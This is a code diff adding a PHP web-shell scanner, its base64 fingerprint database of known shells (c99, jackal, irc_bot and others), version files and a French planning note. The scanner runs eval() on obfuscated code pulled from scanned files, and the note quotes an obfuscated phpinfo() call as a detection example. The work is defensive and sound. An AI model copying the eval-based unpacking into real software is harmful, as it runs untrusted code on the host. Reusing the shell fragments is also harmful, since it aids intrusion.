'clearer'); + } + + /** + * Check files for using suspicious function + */ + private function analyze($file) { + $counter = 0; + $this->counter++; + $content = file_get_contents($file); + $base64_content = base64_encode($content); + $shellflag = $this->unpack($file, $content, $base64_content); + + if ($shellflag != false) { + $this->fileInfo($file, $base64_content); + $shellcolor = 'red'; + preg_match('#(.*)\[(.*?)\]\[(.*?)\]\[(.*?)\]#', $shellflag, $shellmatch); + if (is_array($shellmatch) && count($shellmatch)>0) { + $shellflag = $shellmatch[1] . '(' . $shellmatch[4] . ')'; + switch($shellmatch[3]) { + case 1 : + $shellcolor = 'orange'; + $shellflag .= ' ' . $this->t('please note it`s a malicious file not a shell'); + break; + case 2: + $shellcolor = 'orange'; + $shellflag .= ' ' . $this->t('please note potentially dangerous file (legit file but may be used by hackers)'); + break; + } + } + if ($this->isConsole() && !$this->isBrief()) { + print "$file: $shellflag\n"; + } + self::output('<dt>' . $this->t('Fingerprint:') . '</dt><dd class="' . $shellcolor . '">' . $this->t('Positive, it`s a ') . $shellflag . '</dd></dl></dd></dl>', null, false); + } else if ($this->hidesuspicious != true) { + if (preg_match_all($this->_regex, $content, $matches)) { + $this->fileInfo($file, $base64_content); + if ($this->showlinenumbers) { + self::output('<dt>' . $this->t('suspicious functions used:') . '</dt><dd>', null, false); + $_content = explode("\n", $content); + for ($line = 0; $line < count($_content); $line++) { + if (preg_match_all($this->_regex, $_content[$line], $matches)) { + $lineid = md5($line . $file); + self::output($this->_implode($matches) . ' (<a href="#" class="showline" id="ne_' . $lineid . '">' . $this->t('line:') . ($line + 1) . '</a>);', null, false); + self::output('<div class="hidden source" id="line_' . $lineid . '"><code>' . htmlentities($_content[$line]) . '</code></div>', null, false); + } + } + self::output(' </dd>', null, false); + } else { + self::output('<dt>' . $this->t('suspicious functions used:') . '</dt><dd>' . $this->_implode($matches) . ' </dd>', null, false); + } + $key = $this->fileprepare($file, $base64_content); + self::output('<dt>' . $this->t('Fingerprint:') . '</dt><dd class="green">' . $key . '</dd></dl></dd></dl>', null, false); + $this->suspcounter++; + } + } else { + if (preg_match_all($this->_regex, $content, $matches)) { + $this->suspcounter++; + } + } + } + + /** + * Check files for using suspicious function + */ + private function anaylize() { + foreach ($this->_files as $file) { + if (is_readable($file)) { + $this->analyze($file); + } + } + self::output('', 'clearer'); + self::output($this->t('<strong>Status</strong>: @count suspicious files found and @shells shells found. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">Rescan and show suspicious files</a>' , array("@count" => $this->suspcounter, "@shells" => count($this->_badfiles) ? '<strong>' . count($this->_badfiles) . '</strong>' : count($this->_badfiles))), (count($this->_badfiles) ? 'error' : 'success')); + } + + /** + * Prepare file submit function + */ + private function fileprepare($file, $base64_content) { + $filtered_file = filter_var($file, FILTER_SANITIZE_SPECIAL_CHARS); + $key = $this->t('Negative') . ' <small class="source_submit_parent">(' . $this->t('if wrong') . ' <a href="#" id="m_' . md5($file) . '" class="source_submit">' . $this->t('submit file for analize') . '</a>)</small>'; + $key .= '<div id="wrapform_' . md5($file) . '" class="hidden"><iframe border="0" scrolling="no" class="hidden" id="iform_' . md5($file) . '" name="iform_' . md5($file) . '" src="http://www.shelldetector.com/api/loader.html" />"></iframe>'; + if ($this->submitfile == 0) { + $key .= '<form id="form_' . md5($file) . '" target="iform_' . md5($file) . '" action="http://www.shelldetector.com/api/?task=submit&ver=2" method="post">'; + } else { + $key .= '<form id="form_' . md5($file) . '" target="iform_' . md5($file) . '" action="?task=sendfile" method="post">'; + } + $key .= '<dl><dt>' . $this->t('Submit file') . ' ' . basename($filtered_file) . '</dt><dd>'; + $key .= '<dl><dt class="submit_email">' . $this->t('Your email') . '<br /><span class="small">' . $this->t('(in case you want to be notified):') . '</span></dt><dd class="submit_email_field"><input type="text" name="email" id="email" value="" class="text ui-widget-content ui-corner-all" /></dd></dl></dd></dl>'; + + if ($this->submitfile == 0) { + if (function_exists('openssl_public_encrypt')) { + if (openssl_public_encrypt($base64_content, $crypted_data, base64_decode($this->_public_key))) { + $key .= '<input type="hidden" name="crypted" value="1" /><input type="hidden" name="code" value="' . base64_encode($crypted_data) . '" /></form>'; + } else { + $key .= '<input type="hidden" name="code" value="' . $base64_content . '" />'; + } + } else { + $key .= '<input type="hidden" name="code" value="' . $base64_content . '" />'; + } + } + $key .= '<input type="hidden" name="filename" value="' . base64_encode($file) . '" /></form>'; + $key .= '</div>'; + return $key; + } + + /** + * Show file information + */ + private function fileInfo($file, $base64_content) { + $owner = fileowner($file); + $self_owner = getmyuid(); + $permissions = substr(sprintf('%o', fileperms($file)), -4); + if (function_exists('posix_getpwuid')) { + $owner = posix_getpwuid($owner); + $owner = $owner['name']; + $self_owner = posix_getpwuid($self_owner); + $self_owner = $self_owner['name']; + } + if ($owner !== $self_owner) { + $owner = '<span class="orange">' . $owner .'</span> <small>(' . $this->t('Please note: file have different owner') . ')</small>'; + } + if (intval($permissions) == 777) { + $permissions = '<span class="orange">' . $permissions .'</span> <small>(' . $this->t('Please note: file have full access permissions') . ')</small>'; + } + $filtered_file = filter_var($file, FILTER_SANITIZE_SPECIAL_CHARS); + self::output('<dl><dt>' . $this->t('Suspicious behavior found in:') . ' ' . basename($filtered_file) . '<span class="plus">-</span></dt>', null, false); + self::output('<dd><dl><dt>' . $this->t('Full path:') . '</dt><dd>' . $filtered_file . '</dd>', null, false); + self::output('<dt>' . $this->t('Owner:') . '</dt><dd>' . $owner . '</dd>', null, false); + self::output('<dt>' . $this->t('Permission:') . '</dt><dd>' . $permissions . '</dd>', null, false); + self::output('<dt>' . $this->t('Last accessed:') . '</dt><dd>' . date($this->dateformat, fileatime($file)) . '</dd>', null, false); + self::output('<dt>' . $this->t('Last modified:') . '</dt><dd>' . date($this->dateformat, filemtime($file)) . '</dd>', null, false); + self::output('<dt>' . $this->t('MD5 hash:') . '</dt><dd>' . md5($base64_content) . '</dd>', null, false); + self::output('<dt>' . $this->t('Filesize:') . '</dt><dd>' . $this->HumanReadableFilesize($file) . '</dd>', null, false); + } + + /** + * Unpacking function, main idea taken from http://www.tareeinternet.com/ + */ + private function unpack($file, $content, $base64_content) { + if ($flag = ($this->fingerprint($file, $base64_content)) ) { + return $flag; + } elseif ($flag = ($this->fingerprint($file, $content))) { + return $flag; + } else { + $counter = 0; + $encoded_content = preg_replace("/<\?php|\?>|<\?/", "", $content); + $temp = array(); + if (preg_match("/(\beval\b\(gzinflate|\beval\b\(base64_decode)/", $encoded_content)) { + while (preg_match("/\beval\((gzinflate|base64_decode)\((.*?)\);/", $encoded_content, $matches)) { + $encoded_content = preg_replace("/<\?php|\?>|<\?|eval/", "", $encoded_content); + $temp = $matches; + if (isset($matches[1]) && isset($matches[2]) && strpos($matches[2], '$') === false) { + eval("\$encoded_content = " . $matches[1] . '(' . $matches[2] . ";"); + } else if (isset($matches[1]) && isset($matches[2]) && strpos($matches[2], '$') !== false) { + preg_match('/\$(.*?)\)/', $matches[2], $variable); + if (isset($variable[1])) { + preg_match('/\$' . $variable[1] . '=(.*?);/', $content, $content_match); + if (isset($content_match[1])) { + $content_temp = $matches[1] . '(' . str_replace('$' . $variable[1], $content_match[1], $matches[2]); + eval("\$encoded_content = " . $content_temp . ";"); + } else { + $encoded_content = ''; + } + } else { + $encoded_content = ''; + } + } else { + $encoded_content = ''; + } + if ($counter > 20) { + //protect from looping + break; + } + $counter++; + } + } else if (preg_match("/preg_replace.*\/e\"/", $encoded_content)) { + while (preg_match("/preg_replace\((.*?)\/e(.*)\);/", $encoded_content, $matches)) { + $encoded_content = preg_replace("/<\?php|\?>|<\?/", "", $encoded_content); + preg_replace("/preg_replace\((.*?)\/e(.*)\);/", "", $encoded_content); + if (isset($matches[1]) && isset($matches[2])) { + eval("\$encoded_content = preg_replace(" . $matches[1] . '/' . $matches[2] . ');'); + } + if ($counter > 20) { + //protect from looping + break; + } + $counter++; + } + } else { + $encoded_content = ''; + } + if ($encoded_content != '') { + $encoded_content64 = base64_encode($encoded_content); + $flag = $this->fingerprint($file, $encoded_content64); + } else { + $flag = false; + } + } + return $flag; + } + + /** + * Fingerprint function + */ + private function fingerprint($file, $content = null) { + $key = false; + + // pre prepare all the fingerprints on the first request for optimisation. + static $fingerprint_cache = array(); + if(empty($fingerprint_cache) === true){ + foreach ($this->fingerprints as $fingerprint => $shell){ + if (strpos($fingerprint, 'bb:') !== false) { + $fingerprint = base64_decode(str_replace('bb:', '', $fingerprint)); + } + $fingerprint_cache['/' . preg_quote($fingerprint, '/') . '/'] = $shell; + } + } + + foreach ($fingerprint_cache as $fingerprint => $shell) { + if (preg_match($fingerprint, $content)) { + # [version] => 1359928984 db content FIXME?!?!? + if ($fingerprint == "version") break; + $key = $shell; + $this->_badfiles[] = $file; + break; + } + } + return $key; + } + + /** + * Recursively implode array + */ + private function _implode($array, $glue = ', ') { + $temp = array(); + foreach ($array as $value) { + if (is_array($value)) { + $temp[] = $this->_implode($value); + } else { + $temp[] = $value; + } + } + return implode($glue, array_unique($temp)); + } + + /** + * Output footer function + */ + private function footer() { + self::output('</div></body></html>', null, false); + if ($this->is_cron || $this->console) { + $this->flush(); + } + } + + /** + * Output header function + */ + private function header() { + $style = '<style type="text/css" media="all">body{background-color:#ccc;font:13px tahoma,arial;color:#151515;direction:ltr}h1{text-align:center;font-size:24px}dl{margin:0;padding:0}#content{width:1024px;margin:0 auto;padding:35px 40px;border:1px solid #e8e8e8;background:#fff;overflow:hidden;-webkit-border-radius:7px;-moz-border-radius:7px;border-radius:7px}dl dt{cursor:pointer;background:#5f9be3;color:#fff;float:left;font-weight:700;margin-right:10px;width:99%;position:relative;padding:5px}dl dt .plus{position:absolute;right:4px}dl dd{margin:2px 0;padding:5px 0}dl dd dl{margin-top:24px;margin-left:60px}dl dd dl dt{background:#4fcba3!important;width:180px!important}.error{background-color:#ffebe8;border:1px solid #dd3c10;padding:4px 10px;margin:5px 0}.success{background-color:#fff;border:1px solid #bdc7d8;padding:4px 10px;margin:5px 0}.info{background-color:#fff9d7;border:1px solid #e2c822;padding:4px 10px;margin:5px 0}.clearer{clear:both;height:0;font-size:0}.hidden{display:none}.green{font-weight:700;color:#92b901}.red{font-weight:700;color:#dd3c10}.orange{font-weight:700;color:#ff7f00}.green small{font-weight:400!important;color:#151515!important}.filesfound {position: relative}.files {position: absolute;left:4px;background-color:#FFF9D7}iframe{border:0px;height:80px;width:100%}.small{font-size: 10px;font-weight:normal;}.ui-widget-content dl dd dl {margin-left: 0px !important;}.ui-widget-content input {width: 310px;margin-top: 4px;}.submit_email {width: 190px !important;}.submit_email_field{float: left; width: 100px !important;}#loader{position:fixed;top:25%;bottom:0;left:45%;z-index:99;display:block;text-align:center;width:100%;padding-top:125px;text-align:left;font-weight:700;text-transform:uppercase;text-indent:-20px;font-size:24px;color:#5f9be3}#circularG{position:relative;width:128px;height:128px}.circularG{position:absolute;background-color:#5f9be3;width:29px;height:29px;-webkit-border-radius:19px;-moz-border-radius:19px;-webkit-animation-name:bounce_circularg;-webkit-animation-duration:1.04s;-webkit-animation-iteration-count:infinite;-webkit-animation-direction:linear;-moz-animation-name:bounce_circularg;-moz-animation-duration:1.04s;-moz-animation-iteration-count:infinite;-moz-animation-direction:linear;border-radius:19px;-o-animation-name:bounce_circularg;-o-animation-duration:1.04s;-o-animation-iteration-count:infinite;-o-animation-direction:linear;-ms-animation-name:bounce_circularg;-ms-animation-duration:1.04s;-ms-animation-iteration-count:infinite;-ms-animation-direction:linear}#circularG_1{left:0;top:50px;-webkit-animation-delay:.39s;-moz-animation-delay:.39s;-o-animation-delay:.39s;-ms-animation-delay:.39s}#circularG_2{left:14px;top:14px;-webkit-animation-delay:.52s;-moz-animation-delay:.52s;-o-animation-delay:.52s;-ms-animation-delay:.52s}#circularG_3{top:0;left:50px;-webkit-animation-delay:.65s;-moz-animation-delay:.65s;-o-animation-delay:.65s;-ms-animation-delay:.65s}#circularG_4{right:14px;top:14px;-webkit-animation-delay:.78s;-moz-animation-delay:.78s;-o-animation-delay:.78s;-ms-animation-delay:.78s}#circularG_5{right:0;top:50px;-webkit-animation-delay:.91s;-moz-animation-delay:.91s;-o-animation-delay:.91s;-ms-animation-delay:.91s}#circularG_6{right:14px;bottom:14px;-webkit-animation-delay:1.04s;-moz-animation-delay:1.04s;-o-animation-delay:1.04s;-ms-animation-delay:1.04s}#circularG_7{left:50px;bottom:0;-webkit-animation-delay:1.17s;-moz-animation-delay:1.17s;-o-animation-delay:1.17s;-ms-animation-delay:1.17s}#circularG_8{left:14px;bottom:14px;-webkit-animation-delay:1.3s;-moz-animation-delay:1.3s;-o-animation-delay:1.3s;-ms-animation-delay:1.3s}@-webkit-keyframes bounce_circularg{0%{-webkit-transform:scale(1)}100%{-webkit-transform:scale(.3)}}@-moz-keyframes bounce_circularg{0%{-moz-transform:scale(1)}100%{-moz-transform:scale(.3)}}@-o-keyframes bounce_circularg{0%{-o-transform:scale(1)}100%{-o-transform:scale(.3)}}@-ms-keyframes bounce_circularg{0%{-ms-transform:scale(1)}100%{-ms-transform:scale(.3)}}</style>'; + $script = 'function init(){$("#loader").hide();$("dt").live("click", function(){var text=$(this).children(".plus");if(text.length){$(this).next("dd").slideToggle();if(text.text()=="+"){text.text("-")}else{text.text("+")}}});$(".showline").live("click", function(){var id="li"+$(this).attr("id");$("#"+id).dialog({height:440,modal:true,width:600,title:"Source code"});return false});$(".source_submit").live("click",function(){var id="for"+$(this).attr("id");$("#wrap"+id).dialog({autoOpen:false,height:200,width:550,modal:true,resizable: false,title:"File submission",buttons: {"Submit file to analysis": function() {if ($(".ui-dialog-content form").length) {$("#i"+id).removeClass("hidden");$("#"+id).submit();$(".ui-dialog-content form").remove();} else {alert("This file already submited");}}/*,"Submit file to Virustotal": function () {alert("Not implemented");}*/}});$("#wrap"+id).dialog("open");return false})}$(document).ready(init);'; + self::output('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex"><title>Web Shell Detector</title>' . $style . '<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.21/themes/base/jquery-ui.css" type="text/css" media="all" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.21/jquery-ui.js" type="text/javascript" charset="utf-8"></script><script type="text/javascript">' . $script . '</script></head><body><h1>' . $this->_title . ' v' . $this->_version . '<br />(PHP Version: ' . phpversion() .')</h1><div id="loader"><div id="circularG"><div id="circularG_1" class="circularG"></div><div id="circularG_2" class="circularG"></div><div id="circularG_3" class="circularG"></div><div id="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div><span class="loader_text"> ' . $this->t('Please wait') . '</span></div></div><div id="content">', null, false); + } + + /** + * Output + */ + static function output($content, $class = 'info', $html = true) { + if ((isset(self::$_settings) && isset(self::$_settings['is_cron']) && self::$_settings['is_cron']) || + (isset(self::$_settings) && isset(self::$_settings['console']) && self::$_settings['console'])) { + if ($html) { + self::$_output .= '<div class="' . $class . '">' . $content . '</div>'; + } else { + self::$_output .= $content; + } + } else { + if ($html) { + print '<div class="' . $class . '">' . $content . '</div>'; + } else { + print $content; + } + flush(); + } + } + + /** + * Save scanned data to file + */ + private function flush() { + if ($this->isConsole()) { + print "$this->counter files, $this->suspcounter suspicious, ".count($this->_badfiles)." shells\n"; + } + if ($this->is_cron) { + $filename = date($this->report_format, time()); + if (file_put_contents($filename, self::$_output)) { + print $this->t('Done, report file created'); + } else { + print $this->t('Error, report file creation failed'); + } + } + } + + /** + * Translate function (ported from Drupal) + */ + private function t($string, $args = array()) { + if ($this->language) { + if (is_file('lang/' . $this->language . '.php')) { + include ('lang/' . $this->language . '.php'); + if (isset($local[$string])) { + $string = $local[$string]; + } + } + } + + if (empty($args)) { + return $string; + } else { + foreach ($args as $key => $value) { + switch ($key[0]) { + case '@' : + $args[$key] = $value; + break; + } + } + return strtr($string, $args); + } + } + + /** + * Recursivly list directories + */ + private function listdir($dir) { + if (!is_dir($dir) || !is_readable($dir)) { + return true; + } + $handle = opendir($dir); + if ($this->filelimit > 0) { + if (count($this->_files) > $this->filelimit) { + return true; + } + } + while (($file = readdir($handle)) !== false) { + if ($file == '.' || $file == '..') { + continue; + } + $filepath = $dir == '.' ? $file : $dir . '/' . $file; + if (is_link($filepath)) { + continue; + } + if (is_file($filepath)) { + if (substr(basename($filepath), 0, 1) != "." || $this->scan_hidden) { + $extension = pathinfo($filepath); + if (is_string($this->extension) && $this->extension == '*') { + if ($this->filelimit > 0) { + $this->_files[] = $filepath; + } else { + $this->analyze($filepath); + } + } else { + if (isset($extension['extension']) && in_array($extension['extension'], $this->extension)) { + if ($this->_self != basename($filepath)) { + if ($this->filelimit > 0) { + $this->_files[] = $filepath; + } else { + $this->analyze($filepath); + } + } + } + } + } + } else if (is_dir($filepath)) { + if (substr(basename($filepath), 0, 1) != "." || $this->scan_hidden) { + $this->listdir($filepath); + } + } + } + self::output('<span class="files">' . count($this->_files) . '</span>', null, false); + closedir($handle); + } + + /** + * Returns a human readable filesize + * @author wesman20 (php.net) + * @author Jonas John + * @version 0.3 + * @link http://www.jonasjohn.de/snippets/php/readable-filesize.htm + */ + private function HumanReadableFilesize($file) { + $size = filesize($file); + $mod = 1024; + $units = explode(' ', 'B KB MB GB TB PB'); + for ($i = 0; $size > $mod; $i++) { + $size /= $mod; + } + return round($size, 2) . ' ' . $units[$i]; + } + + /** + * Own error handler + */ + static public function error_handler($errno, $errstr, $errfile, $errline) { + switch ($errno) { + case E_USER_WARNING : + case E_USER_ERROR : + case E_USER_NOTICE : + default : + shellDetector::output('<strong>Error: </strong>' . $errstr . ' line: ' . $errline, 'error'); + break; + } + } + +} +?> diff --git a/doc/PHP-Shell-Detector-master/version/app b/doc/PHP-Shell-Detector-master/version/app new file mode 100644 index 0000000000000000000000000000000000000000..243507d7129c493d1ad5618ef18e1f1f721d6dff --- /dev/null +++ b/doc/PHP-Shell-Detector-master/version/app @@ -0,0 +1 @@ +1.66 \ No newline at end of file diff --git a/doc/PHP-Shell-Detector-master/version/db b/doc/PHP-Shell-Detector-master/version/db new file mode 100644 index 0000000000000000000000000000000000000000..02f5d84669f1220b177bc878363a606438c27324 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/version/db @@ -0,0 +1 @@ +1405674947 \ No newline at end of file diff --git a/doc/planning.txt b/doc/planning.txt new file mode 100644 index 0000000000000000000000000000000000000000..6fd2c9e8e2eb5669d3979a2e5384a5abf74c5777 --- /dev/null +++ b/doc/planning.txt @@ -0,0 +1,15 @@ +27.10~10.11 Découverte des outils de développement, recherche de différentes techniques de recherche. Développement de quelques routines de détection basiques +11.11~24.11 Développement plus approfondi: cas d'une détection basée sur les signatures. Début de l'élaboration d'une architecture plus précise +25.11~15.12 Début du développement du module concernant l'entropie, l'indentation, et éventuellement l'obfuscation +16.12~29.12 Evaluation de l'efficacité des techniques mises en place et renforcement des moyens de détection (ou inveresement si trop de faux positifs) +30.12~12.01 Recherche sur les méthodes de détection basée sur la sémantique et sur les règles YARA. Début du développement selon des éléments +13.01~02.02 Début du développement d'un module de détection cherchant des patterns simples: routines dangereuses, code obfusqué, fonctions anonymes, +manipulations sur des strings suspectes (par ex "preg_replace('/x|\s+/','p', ['xh info'][0])();") ... +03.02~16.02 Renforcement du module développé, et début de l'élaboration de l'analyse des résultats +17.02~09.03 Développement d'un module de détection basé sur les règles YARA plus poussé +10.03~23.03 Renforcement du système d'analyse des résultats et début du développement d'un module de détection basé sur la fuite d'information. +(alors que les modules précédents étaient plutôt basés sur de vrais dangers comme des appels système. Ici, ce module de concentrera plutot sur des +routines comme phpinfo()) +24.03~13.04 Renforcement du système d'analyse des résultats +... +a compléter diff --git a/res/shelldetect.db b/res/shelldetect.db new file mode 100755 index 0000000000000000000000000000000000000000..8e3d5015188f44606d07bfc9fabc7ff4f34900c4 --- /dev/null +++ b/res/shelldetect.db @@ -0,0 +1,1065 @@ +YTo2MDQ6e3M6NjQ6IlhScGJ5QXFJQzQzTlNrN0RRb05DaUFnSUNCbWIzSWdLQ1JwSUQwZ01Ec2dK +R2tnUENBa2JXSmZiR1Z1WjNSb08iO3M6MjE6InBocGVtYWlsZXJbMF1bMl1bcGhwXSI7czo2NDoi +T3drSkNRb0tDV1JsWm1GMWJIUTZDZ2tKYzJodmQxOXNjeWdwT3dwOUNncG1kVzVqZEdsdmJpQnph +RzkzWDJ4eiI7czoxNToiY21kWzMxXVswXVtwaHBdIjtzOjY0OiJaZGtvNVRUTlVSM0pJTDJSdlYw +TTBXRzFCUld0WlZuZEJRMVZRVVdRd1IydzBOM1ZFYWxJaUxDSmpNa2R5YlZSIjtzOjE3OiJub25h +bWVbMV1bMF1bcGhwXSI7czo2NDoiMmh2SUNJTkNna0pDUWtOQ2drSklDQWdJQWs4ZEhJK0RRb0pD +UWtnSUNBZ0lDQThkR1FnZDJsa2RHZzlKekV3SiI7czoyMjoiaGlkZGVuc2hlbGxbMF1bMF1bcGhw +XSI7czo2NDoiY205c09pQnVieTFqWVdOb1pWeHVJanNOQ25CeWFXNTBJQ0pEYjI1MFpXNTBMWFI1 +Y0dVNklIUmxlSFF2YUhSdCI7czoxNDoiY21kWzI0XVswXVtwbF0iO3M6NjQ6Ikp5UGdvZ0lDQWdJ +Q0FnSUR4aWNpQXZQanhpY2lBdlBpQThMMlp2Ym5RK0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnUEQiO3M6 +MTk6InM3MnNoZWxsWzBdWzBdW3BocF0iO3M6MTI2OiJHUmxabUYxYkhSZmRYTmxYMkZxWVhnZ1BT +QjBjblZsT3lBa1pHVm1ZWFZzZEY5amFHRnljMlYwSUQwZ0oxZHBibVJ2ZDNNdE1USTFNU2M3SUds +bUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTUiO3M6MjU6ImNvY2Fj +b2xhX3NoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBFWlBVazBnUlU1RFZGbFFSVDBpYlhWc2RHbHdZ +WEowTDJadmNtMHRaR0YwWVNJZ1FVTlVTVTlPUFNKMWNHeHYiO3M6MjY6InNoZWxsX3VwbG9hZGVy +WzEwXVswXVtwaHBdIjtzOjY0OiJXRnlaMmx1TFd4bFpuUTZOWEI0T3lCdFlYSm5hVzR0Y21sbmFI +UTZOWEI0T3ljK2JHOW5hVzQ2UEM5emNHRnVQIjtzOjE0OiJjaWhbMF1bMF1bcGhwXSI7czo2NDoi +WmlrdUlpa2hQQzlpUGp3dlkyVnVkR1Z5UGlJN2ZRMEtJQ0JsYkhObElIdGxZMmh2SUNJOFkyVnVk +R1Z5UGp4aSI7czoxNToiYzk5WzI2XVswXVtwaHBdIjtzOjY0OiJoYldVb0tTNGlYRzRpT3cwS1B6 +NE5DanhvY2o0OEwzQnlaVDROQ2lBZ0lDQThkR0ZpYkdVK1BHWnZjbTBnYldWIjtzOjIwOiJsYW1h +c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRlVsc25Va1ZOVDFSRlgwRkVSRkluWFR0bFkyaHZJQ0ln +YzJsNlpUMHhOejQ4TDNSa1Bqd3ZkSEkrUEhSeVBqeCI7czoxNzoiamFja2FsWzFdWzBdW3BocF0i +O3M6NjQ6IkNna0pDV0Z5Y21GNVgzQnZjQ2drWlhoNEtUc05DZzBLQ1FrSlB6NE5DZzBLQ1FrSlJH +bHlaV04wYjNKNUlFTnYiO3M6MTc6ImNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJhekUxTUM1a1pT +OTNMMlJrSWlrN0lBMEtjM2x6ZEdWdEtDSmphRzF2WkNBM056Y2daR1FpS1RzZ0RRcHplWE4wIjtz +OjE3OiJ0cm95YW5bMF1bMF1bcGhwXSI7czo2NDoiUVowbFNObkpXVUZkdFJqRmFWbXRtZUhKQkx6 +UkhVMUV5SzNaSFoyTkdXVmRhZUZaaWRVbHhZMHcwTWxOTlNUSiI7czoxNzoiYjM3NGtbMTNdWzBd +W3BocF0iO3M6NjQ6ImxkR012YUhSMGNHUXVZMjl1WmcwS0wyVjBZeTl3ZFhKbExXWjBjR1F1WTI5 +dVpnMEtMMlYwWXk5d2RYSmxMV1oiO3M6MjA6InBocHNoZWxsWzMyXVswXVtwaHBdIjtzOjY0OiJM +VlVuTENBblkzQTROalluS1RzS0NTUnZjSFJmWTJoaGNuTmxkSE1nUFNBbkp6c0tDV1p2Y21WaFky +Z29KR05vIjtzOjE5OiJmaWxlc21hbls5XVswXVtwaHBdIjtzOjY0OiJPblIvVlVBalFDWmtOMlFp +SzJReVMzZ3ZmeUJKZjA1clRXNWVXU3hLTkZsUGQyd21TbWhCYUdNdldDZ3JMbEp4IjtzOjIwOiJj +eWJlcnNweTVbMF1bMF1bYXNwXSI7czo2NDoiRmpkR2x2YmowbmFIUjBjRG92TDNkM2R5NW9ZWE5v +WTJobFkydGxjaTVrWlM5b1lYTm9MbU5uYVQ4bk8yUnZZMyI7czoyMDoiZmlsZXNtYW5bMTRdWzBd +W3BocF0iO3M6NjQ6IjVRVlZRZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOUoxSjFiaWMrRFFvOEww +WlBVazArRFFvTkNqd2xRQ0J3WVciO3M6MTU6ImNtZFsxOF1bMF1banNwXSI7czo2NDoieWNXMUNj +RmRGZDNWUmJVVXhNMEUzYmxkWlJXSk5TMWRXTlc0MmNqQmxOQ3Q2YUdSNlVqY3JlRUZUZWtKa1RI +ZCI7czoyMDoicGhwc2hlbGxbMzNdWzBdW3BocF0iO3M6NTk6IlBHRWdhSEpsWmowaWFIUjBjRG92 +TDNkM2R5NXdiMnhwYzJodVpYZHpMbU52YlM5cGJtUmxlQzV3YUhBIjtzOjI0OiJzcGFtX3RydXN0 +YXBwWzBdWzFdW3BocF0iO3M6NjQ6IlpYTWdQVHhKVGtaUFBpQTdDbU5zYjNObEtFbE9SazhwT3dw +emVYTjBaVzBvUUd4cGJtVnpLVHNLY0hKcGJuUW4iO3M6MjQ6ImFyYWJfYmxhY2tfaGF0WzBdWzBd +W3BsXSI7czo2NDoiSUR3dmRHRmliR1UrRFFvZ0lDQWdJQ0FnSUEwS0RRb25PeUFOQ2cwS1B6NE5D +anhpYjJSNUlHSm5ZMjlzYjNJOSI7czoyMDoiaW5kaXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBE +OVFTRkFLSkdacGJHVWdQU0JtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMMmhoWTJ0 +bGNteGgiO3M6MTk6InNhdmVmaWxlWzBdWzBdW3BocF0iO3M6NjQ6InljM1JoZEhWeklpazdJQTBL +SUNBa2MzRnNjWFZwWTJ0c1lYVnVZMmhiWFNBOUlHRnljbUY1S0NKVFpYSjJaWEkiO3M6MTk6Imdu +eXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6ImNHRnVQand2Wm05dWRENDhabTl1ZENCamIyeHZjajBp +SXpGRU1VUXhSQ0lnWm1GalpUMGlWR0ZvYjIxaElpQnoiO3M6MTk6ImhhY2tlcnBzWzBdWzBdW3Bo +cF0iO3M6NjQ6Im1kMGFEb2dJaUF1SUhOMGNteGxiaWdrZEdocGN5MCtZWEpqYUdsMlpTa3BPdzBL +SUNBZ0lDQWdJQ0JvWldGa1oiO3M6MjU6InBocGZpbGVtYW5hZ2VyWzJdWzJdW3BocF0iO3M6NjQ6 +IkhneU1HWmNlREl6WEhneE4xeDRNREZRWEhneE16RmNlREJrTkdaY2VETmxTMXg0TUdNd1dGeDRN +VFZjZURFeVgiO3M6MjI6Impvb21sYV9zcGFtWzFdWzFdW3BocF0iO3M6NjQ6ImZVa1ZSVlVWVFZG +c25kWE5sY2lkZEtTay9KRjlTUlZGVlJWTlVXeWQxYzJWeUoxMDZJaUk3RFFwcFppZ2habWwiO3M6 +MTc6ImphY2thbFswXVswXVtwaHBdIjtzOjY0OiIwTGtadmNtMG9JbTF2WkdVaUtTa0taWGhwZENC +emRXSUtaVzVrSUdsbUNtVnVaQ0JwWmdvS1NIUnRiRWhsWVdSIjtzOjIyOiJlbG1hbGlzZWtlclsw +XVswXVthc3BdIjtzOjY0OiJiMk5yWlhRc0lDSlFVa2xXVFZOSElDUndjbWx1ZEd3Z09pQk9iV0Z3 +SUZCdmNuUlRZMkZ1SURFeU9pNGdOSHdnIjtzOjE3OiJpcmNfYm90WzBdWzBdW3BsXSI7czo2NDoi +SUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZV +VlZGVTFSYiI7czoxNDoiY21kWzRdWzBdW3BocF0iO3M6NjQ6IkJJSzBSWGExRTVNRlpxWVV0RGRW +bHhhbkJTUWs1alUzVlpNMjVZUkhaYVZEbGlTazl5TUZsaFFtMUhiWFJxUTIiO3M6MTk6InBocHNo +ZWxsWzJdWzBdW3BocF0iO3M6NjQ6IlpTQnBaRDBpZEdGaWJHVXlJaUJ6ZEhsc1pUMGlZbTl5WkdW +eUxXTnZiR3hoY0hObE9pQmpiMnhzWVhCelpUc2kiO3M6MTg6InRlYW1zcWxbMF1bMF1bcGhwXSI7 +czo2NDoiQ1IxY213Z0tRMEtDUWw3RFFvSkNRa2tWVkpNY0dOeklEMGdLQ0J3WVhKelpWOTFjbXdv 